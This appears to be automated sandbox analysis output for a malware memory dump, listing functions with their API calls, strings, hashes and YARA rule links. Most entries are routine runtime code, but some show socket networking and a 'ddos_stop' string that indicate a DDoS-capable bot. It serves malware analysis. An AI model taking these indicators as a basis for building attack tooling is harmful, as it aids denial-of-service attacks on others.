String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 6431df92868b70180a20722ac752c98de187c5c4d3c613954e40ebea0536c66f
Instruction ID: a8c62cec194af75547a06af4c4d031433f53898ae6789a29735227d731b8ce65
Opcode Fuzzy Hash: 6431df92868b70180a20722ac752c98de187c5c4d3c613954e40ebea0536c66f
Instruction Fuzzy Hash: A4517571C05298AEEF50EBA9D8417EDBBF4EF55300F1040AEE519F7282DA781E44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040A602, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A607
_strlen.LIBCMT ref: 0040A62F

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040A679
_strlen.LIBCMT ref: 0040A6C0
_strlen.LIBCMT ref: 0040A707
_strlen.LIBCMT ref: 0040A751
_strlen.LIBCMT ref: 0040A7B0

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040A6AB, 0040A6B6, 0040A6C7
54FF53A5F1D36F1C, xrefs: 0040A6F2, 0040A6FD, 0040A70E
10E527FADE682D1D, xrefs: 0040A739, 0040A744, 0040A758
A09E667F3BCC908B, xrefs: 0040A617, 0040A625, 0040A636
B05688C2B3E6C1FD, xrefs: 0040A78C, 0040A79D, 0040A7B7
B67AE8584CAA73B2, xrefs: 0040A664, 0040A66F, 0040A680

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: aa268b186d027120337d8823aed5358b6f19215f549046a4b703b4a489d2ed2d
Instruction ID: f0ce4762724f2496d363b9ff8ce18a79b1f23062014612d5764ce21e7d78337e
Opcode Fuzzy Hash: aa268b186d027120337d8823aed5358b6f19215f549046a4b703b4a489d2ed2d
Instruction Fuzzy Hash: 73518470C05298AEEF50EBA9D841BEDBBF4AF55304F1040AEE518F7282DA781F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408A51, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408A56
_strlen.LIBCMT ref: 00408A7E

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 00408AC8
_strlen.LIBCMT ref: 00408B0F
_strlen.LIBCMT ref: 00408B56
_strlen.LIBCMT ref: 00408BA0
_strlen.LIBCMT ref: 00408BFF

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00408AFA, 00408B05, 00408B16
54FF53A5F1D36F1C, xrefs: 00408B41, 00408B4C, 00408B5D
10E527FADE682D1D, xrefs: 00408B88, 00408B93, 00408BA7
A09E667F3BCC908B, xrefs: 00408A66, 00408A74, 00408A85
B05688C2B3E6C1FD, xrefs: 00408BDB, 00408BEC, 00408C06
B67AE8584CAA73B2, xrefs: 00408AB3, 00408ABE, 00408ACF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: b7b5b2c5fb87969cac7552a151f54fee3c5a73f2cceffb5fad353713df1c4176
Instruction ID: 82927464066e5d64ad563dfa16edb15fe9c21c111162d48adc6cf5b025f25bcb
Opcode Fuzzy Hash: b7b5b2c5fb87969cac7552a151f54fee3c5a73f2cceffb5fad353713df1c4176
Instruction Fuzzy Hash: 40518570C05298AEEF51EBA9D841BEDBBF4AF55300F1040AEE518F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC0, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404CC5
_strlen.LIBCMT ref: 00404CED

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 00404D37
_strlen.LIBCMT ref: 00404D7E
_strlen.LIBCMT ref: 00404DC5
_strlen.LIBCMT ref: 00404E0F
_strlen.LIBCMT ref: 00404E6E

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00404D69, 00404D74, 00404D85
54FF53A5F1D36F1C, xrefs: 00404DB0, 00404DBB, 00404DCC
10E527FADE682D1D, xrefs: 00404DF7, 00404E02, 00404E16
A09E667F3BCC908B, xrefs: 00404CD5, 00404CE3, 00404CF4
B05688C2B3E6C1FD, xrefs: 00404E4A, 00404E5B, 00404E75
B67AE8584CAA73B2, xrefs: 00404D22, 00404D2D, 00404D3E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 948c75a098234b184cbb033c1d0e9676e4c7ae8c564396b62216d880e0880075
Instruction ID: eaae416ebb35603555c3f789ceabeecb30c4b6f400c3e9e5542155036aaf6c01
Opcode Fuzzy Hash: 948c75a098234b184cbb033c1d0e9676e4c7ae8c564396b62216d880e0880075
Instruction Fuzzy Hash: 83518570C05298AEEB50EBA9D8417EDBBF4AF55300F1040AEE515F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3A, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CE3F
_strlen.LIBCMT ref: 0040CE67

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040CEB1
_strlen.LIBCMT ref: 0040CEF8
_strlen.LIBCMT ref: 0040CF3F
_strlen.LIBCMT ref: 0040CF89
_strlen.LIBCMT ref: 0040CFE8

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040CEE3, 0040CEEE, 0040CEFF
54FF53A5F1D36F1C, xrefs: 0040CF2A, 0040CF35, 0040CF46
10E527FADE682D1D, xrefs: 0040CF71, 0040CF7C, 0040CF90
A09E667F3BCC908B, xrefs: 0040CE4F, 0040CE5D, 0040CE6E
B05688C2B3E6C1FD, xrefs: 0040CFC4, 0040CFD5, 0040CFEF
B67AE8584CAA73B2, xrefs: 0040CE9C, 0040CEA7, 0040CEB8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: d8deeadbb34e9bafd38fe88615a60caf546c4e1159b97d64957dc897c20cb12b
Instruction ID: 541d9324fba16dbb128df455bd45aacc064f521391c7b7f941088558b1f4484e
Opcode Fuzzy Hash: d8deeadbb34e9bafd38fe88615a60caf546c4e1159b97d64957dc897c20cb12b
Instruction Fuzzy Hash: 3E519571C05298AEEF50EBA9D841BEDBBF4AF95300F1040AEE518F7282DB741E44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040AECD, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AED2
_strlen.LIBCMT ref: 0040AEFA

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040AF44
_strlen.LIBCMT ref: 0040AF8B
_strlen.LIBCMT ref: 0040AFD2
_strlen.LIBCMT ref: 0040B01C
_strlen.LIBCMT ref: 0040B07B

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040AF76, 0040AF81, 0040AF92
54FF53A5F1D36F1C, xrefs: 0040AFBD, 0040AFC8, 0040AFD9
10E527FADE682D1D, xrefs: 0040B004, 0040B00F, 0040B023
A09E667F3BCC908B, xrefs: 0040AEE2, 0040AEF0, 0040AF01
B05688C2B3E6C1FD, xrefs: 0040B057, 0040B068, 0040B082
B67AE8584CAA73B2, xrefs: 0040AF2F, 0040AF3A, 0040AF4B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: af4ae903a0264ec3f21d185660754b49eb50be9cfb461a430cb4ccb86d5320a7
Instruction ID: cedfa38532cc3c87211090a3ce261768bfbfd649fecbc882319574a78002f880
Opcode Fuzzy Hash: af4ae903a0264ec3f21d185660754b49eb50be9cfb461a430cb4ccb86d5320a7
Instruction Fuzzy Hash: 93517671C05298AEEB50EBA5D8417EDBBF4AF55300F1080AEE519F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402F3C, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F41
_strlen.LIBCMT ref: 00402F69

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 00402FB3
_strlen.LIBCMT ref: 00402FFA
_strlen.LIBCMT ref: 00403041
_strlen.LIBCMT ref: 0040308B
_strlen.LIBCMT ref: 004030EA

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00402FE5, 00402FF0, 00403001
54FF53A5F1D36F1C, xrefs: 0040302C, 00403037, 00403048
10E527FADE682D1D, xrefs: 00403073, 0040307E, 00403092
A09E667F3BCC908B, xrefs: 00402F51, 00402F5F, 00402F70
B05688C2B3E6C1FD, xrefs: 004030C6, 004030D7, 004030F1
B67AE8584CAA73B2, xrefs: 00402F9E, 00402FA9, 00402FBA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 288bde4518076d48eca8338a6ba019e04b1124070c117ed55b890231e0b944b9
Instruction ID: 4fba442bb1a59a595b84180c4880f6809e2015f66193d20c28dad2148c4affbd
Opcode Fuzzy Hash: 288bde4518076d48eca8338a6ba019e04b1124070c117ed55b890231e0b944b9
Instruction Fuzzy Hash: 04518570C05298AEEF50EBA9D8417EDBBF4AF55310F1080AEE519F7282DB741E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040946C, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409471
_strlen.LIBCMT ref: 00409499

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 004094E3
_strlen.LIBCMT ref: 0040952A
_strlen.LIBCMT ref: 00409571
_strlen.LIBCMT ref: 004095BB
_strlen.LIBCMT ref: 0040961A

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00409515, 00409520, 00409531
54FF53A5F1D36F1C, xrefs: 0040955C, 00409567, 00409578
10E527FADE682D1D, xrefs: 004095A3, 004095AE, 004095C2
A09E667F3BCC908B, xrefs: 00409481, 0040948F, 004094A0
B05688C2B3E6C1FD, xrefs: 004095F6, 00409607, 00409621
B67AE8584CAA73B2, xrefs: 004094CE, 004094D9, 004094EA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 1ee69e59df66f42d35e4bfab513aab1438f436939a98fdf348bc9c08e5ec1b9a
Instruction ID: 4d2ba738191a77f09488d5e29782d35add50baeb1bf84f2c720dbd8f47036253
Opcode Fuzzy Hash: 1ee69e59df66f42d35e4bfab513aab1438f436939a98fdf348bc9c08e5ec1b9a
Instruction Fuzzy Hash: 60517571C05298AEEF50EBA9D841BEDBBF4AF55310F1040AEE518F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4BA, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B4BF
_strlen.LIBCMT ref: 0040B4E7

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040B531
_strlen.LIBCMT ref: 0040B578
_strlen.LIBCMT ref: 0040B5BF
_strlen.LIBCMT ref: 0040B609
_strlen.LIBCMT ref: 0040B668

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040B563, 0040B56E, 0040B57F
54FF53A5F1D36F1C, xrefs: 0040B5AA, 0040B5B5, 0040B5C6
10E527FADE682D1D, xrefs: 0040B5F1, 0040B5FC, 0040B610
A09E667F3BCC908B, xrefs: 0040B4CF, 0040B4DD, 0040B4EE
B05688C2B3E6C1FD, xrefs: 0040B644, 0040B655, 0040B66F
B67AE8584CAA73B2, xrefs: 0040B51C, 0040B527, 0040B538

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 3a21a093ef0309896d476b85f722ee4a8f8e335cc2cddfe10715a3556fa771ec
Instruction ID: 0b10c994a98373b41a76bcbfd873894fa1b253c0060d470191d0c7fac13e59e7
Opcode Fuzzy Hash: 3a21a093ef0309896d476b85f722ee4a8f8e335cc2cddfe10715a3556fa771ec
Instruction Fuzzy Hash: DD518571C05298AEEF50EBA9D841BEDBBF4AF55310F1040AEE518F7282DA781F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0069F720, Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 414COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 0069F7D0
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 0069F7F3

Strings

Expression: , xrefs: 0069FA81
<program name unknown>, xrefs: 0069F7FD
Assertion failed!, xrefs: 0069F74A
Line: , xrefs: 0069FA03
File: , xrefs: 0069F8B5
..., xrefs: 0069F86C, 0069F9B3, 0069FAFF, 0069FBAE, 0069FBF0, 0069FC23
(Press Retry to debug the application - JIT must be enabled), xrefs: 0069FB5B
Program: , xrefs: 0069F78D
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0069FB2D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
API String ID: 4146042529-1508414584
Opcode ID: 7b80eba7eeabd7178fc21f26241d7c372d682fef6f3091b7ea3d7901d9383376
Instruction ID: f46707ea6c946a8ab2291f218ae75ddb0baf0e08649000f720efd0b6707dd3e3
Opcode Fuzzy Hash: 7b80eba7eeabd7178fc21f26241d7c372d682fef6f3091b7ea3d7901d9383376
Instruction Fuzzy Hash: A3D1F4B1A4010DAADF24AB259D85BFB736EEF64704F0541B8EC09D2641F734DE818F65

Uniqueness

Uniqueness Score: -1.00%

Function 006B35AE, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006B35F2

Part of subcall function 006B294C: _free.LIBCMT ref: 006B2969
Part of subcall function 006B294C: _free.LIBCMT ref: 006B297B
Part of subcall function 006B294C: _free.LIBCMT ref: 006B298D
Part of subcall function 006B294C: _free.LIBCMT ref: 006B299F
Part of subcall function 006B294C: _free.LIBCMT ref: 006B29B1
Part of subcall function 006B294C: _free.LIBCMT ref: 006B29C3
Part of subcall function 006B294C: _free.LIBCMT ref: 006B29D5
Part of subcall function 006B294C: _free.LIBCMT ref: 006B29E7
Part of subcall function 006B294C: _free.LIBCMT ref: 006B29F9
Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A0B
Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A1D
Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A2F
Part of subcall function 006B294C: _free.LIBCMT ref: 006B2A41

_free.LIBCMT ref: 006B35E7

Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747

_free.LIBCMT ref: 006B3609
_free.LIBCMT ref: 006B361E
_free.LIBCMT ref: 006B3629
_free.LIBCMT ref: 006B364B
_free.LIBCMT ref: 006B365E
_free.LIBCMT ref: 006B366C
_free.LIBCMT ref: 006B3677
_free.LIBCMT ref: 006B36AF
_free.LIBCMT ref: 006B36B6
_free.LIBCMT ref: 006B36D3
_free.LIBCMT ref: 006B36EB

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 22e0ebc2dc0bc577573503d58250b994c71ce553ff67965e23d9e30414200400
Instruction ID: 30f4044870023e86c0627b08cd35f893ab27d886ae8d4ed0a4237555938979c7
Opcode Fuzzy Hash: 22e0ebc2dc0bc577573503d58250b994c71ce553ff67965e23d9e30414200400
Instruction Fuzzy Hash: CD314CB1600615AFEB60AA39D855BD673EAAF01310F20442DE559DB3A1EF30EE948F24

Uniqueness

Uniqueness Score: -1.00%

Function 004183E9, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 320networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004183ED

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004183F8
gethostbyname.WS2_32(?), ref: 0041842F
htons.WS2_32(00000000), ref: 00418565
socket.WS2_32(00000002,00000001,00000006), ref: 00418618
connect.WS2_32(00000000,?,00000010), ref: 00418633
closesocket.WS2_32(00000000), ref: 00418745

Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E

Strings

GET /, xrefs: 0041856F
d, xrefs: 0041881D
A, xrefs: 0041847B
%, xrefs: 004187D1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrd_sleepThrowclosesocketconnectgethostbynamehtonssocket
String ID: %$A$GET /$d
API String ID: 3725675640-1435572508
Opcode ID: 648e5c07f434278072bda837b4d291c62c7a03407cb08bde53b11658ee7ef102
Instruction ID: 8619baa90a74c0ca68f1c9847fdf6309a755cb345366d807b23a94a538fc79da
Opcode Fuzzy Hash: 648e5c07f434278072bda837b4d291c62c7a03407cb08bde53b11658ee7ef102
Instruction Fuzzy Hash: 13D1E07190064CDEDB01DFA8DC81BEEBBB8FF59304F10816EE505A71A1EB785A84CB55

Uniqueness

Uniqueness Score: -1.00%

Function 005CF810, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 247fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02200000,00000000,?,?,CAAA386B,?,?), ref: 005CF8D8
GetLastError.KERNEL32(?,00000009), ref: 005CF919
new.LIBCMT ref: 005CF998
DeviceIoControl.KERNEL32 ref: 005CF9C6
GetLastError.KERNEL32 ref: 005CF9D0
CloseHandle.KERNEL32(00000000,?,?), ref: 005CFA5A
CloseHandle.KERNEL32(00000000,?,?), ref: 005CFAED

Strings

b\, xrefs: 005CFB1F
b\, xrefs: 005CF83E, 005CF928
boost::filesystem::read_symlink, xrefs: 005CF923, 005CF9DD
Unknown ReparseTag in boost::filesystem::read_symlink, xrefs: 005CFA24

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseErrorHandleLast$ControlCreateDeviceFile
String ID: Unknown ReparseTag in boost::filesystem::read_symlink$boost::filesystem::read_symlink$b\$b\
API String ID: 363509809-1460960970
Opcode ID: 9d1785e568e7c8b1b5a84b9a21aedc9d6e03721c545467178f92e32cc61fe353
Instruction ID: 064bf0c32af61ecafd90c9f19f722e5fad50fb49c4f7204e631bdad730c4ded1
Opcode Fuzzy Hash: 9d1785e568e7c8b1b5a84b9a21aedc9d6e03721c545467178f92e32cc61fe353
Instruction Fuzzy Hash: 6F919270A00208EFEB14DFA4CC49FAEBBB6FF05308F14416EE516AB291D7749A45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004BB388, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004BB38D
__CxxThrowException@8.LIBVCRUNTIME ref: 004BB550

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

std::exception::exception.LIBCONCRT ref: 004BB55F
std::exception::exception.LIBCONCRT ref: 004BB58D
std::exception::exception.LIBCONCRT ref: 004BB51F

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

std::exception::exception.LIBCONCRT ref: 004BB5B1

Strings

expected =, xrefs: 004BB585
attribute && !attribute->parent(), xrefs: 004BB422
expected attribute name, xrefs: 004BB5A9
4s, xrefs: 004BB547, 004BB557, 004BB54F
expected ' or ", xrefs: 004BB517, 004BB55A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
String ID: 4s$attribute && !attribute->parent()$expected ' or "$expected =$expected attribute name
API String ID: 4183761955-1787543433
Opcode ID: e206aa80c2eab8b8878550c8d9e863e126b9cd75c905938bc5f91daac5c78890
Instruction ID: 9082df67099e57361299c8897f934f8f1a7be3fa6ed442b609c97e58f728c1bd
Opcode Fuzzy Hash: e206aa80c2eab8b8878550c8d9e863e126b9cd75c905938bc5f91daac5c78890
Instruction Fuzzy Hash: 93716DB09052459FDB24CF69C0907EABBF0FF19314F24419ED4959B382C3B99A06CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004621C2, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004621C7
_strlen.LIBCMT ref: 00462287
_strlen.LIBCMT ref: 0046229A

Strings

>, xrefs: 00462282, 0046228E
<, xrefs: 00462295, 004622A1
", xrefs: 004622CE, 004622DA
&, xrefs: 004622BB, 004622C7
', xrefs: 004622A8, 004622B4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$H_prolog
String ID: &$'$>$<$"
API String ID: 1011152186-87953025
Opcode ID: 7d8892289894935c4af8791d44a61a7724ca3ea80e63f1ea7f53b1f4b63213fa
Instruction ID: 60619a5e735b1dd61f3ca2b27c7cec5e4ab35684f43ef6a573e82dac1bf29305
Opcode Fuzzy Hash: 7d8892289894935c4af8791d44a61a7724ca3ea80e63f1ea7f53b1f4b63213fa
Instruction Fuzzy Hash: D741E571A00604BEE715DFBCCA9566EB7B8FB11700F50025FE401B3692E7B85E81C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041800C, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 269networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00418010

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041801B
socket.WS2_32(00000002,00000002,00000011), ref: 0041804B
WSAStartup.WS2_32(00000101,?), ref: 00418062
gethostbyname.WS2_32(?), ref: 00418121
htons.WS2_32(00000000), ref: 00418296
closesocket.WS2_32(00000000), ref: 0041836C

Part of subcall function 0044E381: __EH_prolog.LIBCMT ref: 0044E386

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

h, xrefs: 0041816D
Active, xrefs: 0041830F
ddos_stop, xrefs: 0041808C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateExceptionException@8RaiseStartupThrowclosesocketgethostbynamehtonssocketstd::_
String ID: Active$ddos_stop$h
API String ID: 3743251553-2142136108
Opcode ID: 3dae2422fa5d6f141fd77e02618883fee58d079cce41aaeec1caba3c0c3c9235
Instruction ID: de7d4fac30d88718c9cfa24d6dd51cf25e670066548554b16bac75a5c4634514
Opcode Fuzzy Hash: 3dae2422fa5d6f141fd77e02618883fee58d079cce41aaeec1caba3c0c3c9235
Instruction Fuzzy Hash: 90A1D071900248EEDB11DFB9CC46BED7BB8EF15304F10816EF505A7292EB785A84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 006AC1A8, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,006AEB26,00422A2B), ref: 006AC1CB

Strings

exp, xrefs: 006AC290, 006AC2F2
asin, xrefs: 006AC337
log, xrefs: 006AC271, 006AC27D
pow, xrefs: 006AC2AF, 006AC35B, 006AC36E
&j+*B, xrefs: 006AC3B0
0A, xrefs: 006AC241, 006AC2DB, 006AC393
log10, xrefs: 006AC215, 006AC265
sqrt, xrefs: 006AC34F
acos, xrefs: 006AC343

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DecodePointer
String ID: &j+*B$0A$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1952416337
Opcode ID: b1498f812940c7db842295f5c54563209ee7a2567a21828b34bcb296b9742395
Instruction ID: b357d7ce9e5ce8eb6c6d449c601a788c08307e782ee0f65c8484335bdf4d4de5
Opcode Fuzzy Hash: b1498f812940c7db842295f5c54563209ee7a2567a21828b34bcb296b9742395
Instruction Fuzzy Hash: 535160B0904609CBCF14EFA8D9485ECBBB2FF4A324F248199D441A7354CB768E648F69

Uniqueness

Uniqueness Score: -1.00%

Function 00401346, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040136F
_strlen.LIBCMT ref: 004013B6
_strlen.LIBCMT ref: 004013FD
_strlen.LIBCMT ref: 00401447
_strlen.LIBCMT ref: 004014A6

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 004013A1, 004013AC, 004013BD
54FF53A5F1D36F1C, xrefs: 004013E8, 004013F3, 00401404
10E527FADE682D1D, xrefs: 0040142F, 0040143A, 0040144E
B05688C2B3E6C1FD, xrefs: 00401482, 00401493, 004014AD
B67AE8584CAA73B2, xrefs: 0040135A, 00401365, 00401376

Memory Dump Source

